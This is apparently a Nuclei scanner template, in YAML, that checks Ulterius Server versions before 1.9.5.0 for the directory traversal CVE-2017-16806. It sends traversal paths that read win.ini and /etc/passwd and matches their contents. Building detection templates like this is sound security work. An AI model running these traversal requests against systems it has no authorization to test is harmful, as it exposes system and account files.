27 lines
632 B
YAML
27 lines
632 B
YAML
id: CVE-2017-16806
|
|
|
|
info:
|
|
name: Ulterius Server < 1.9.5.0 - Directory Traversal
|
|
author: geeknik
|
|
reference: https://www.exploit-db.com/exploits/43141
|
|
severity: high
|
|
tags: cve,cve2017,ulterius,traversal
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"
|
|
- "{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
- "\\[(font|extension|file)s\\]"
|
|
conditon: or
|
|
part: body
|